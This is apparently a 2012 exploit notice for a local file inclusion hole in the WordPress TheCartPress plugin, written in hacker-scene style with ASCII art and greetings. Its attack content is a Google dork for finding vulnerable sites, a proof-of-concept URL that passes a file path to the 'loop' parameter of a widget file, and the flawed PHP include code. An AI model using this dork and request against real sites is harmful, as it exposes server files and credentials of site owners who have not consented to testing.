+----------------------------------------------------------------------+
# Exploit Title: wordpress thecartpress plugin local file inclusion LFI
# Google Dork: inurl:wp-content/plugins/thecartpress/widgets/
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Greetz: Milw0rm 1337day.com
# Software Link: http://wordpress.org/extend/plugins/thecartpress/download/
____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+
[+] p0c : http://[SERVER]/wp-content/plugins/thecartpress/widgets/CustomPostTypeListWidget.class.php?loop=[LFI]
[+] vulnerable code :
if ( isset( $instance['loop'] ) && strlen( $instance['loop'] ) > 0 && file_exists( $instance['loop'] ) )
{ include( $instance['loop'] );
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
mAhna mAhna
[+] profile : www.facebook.com/TN.spl0it3r
+----------------------------------------------------------------------+
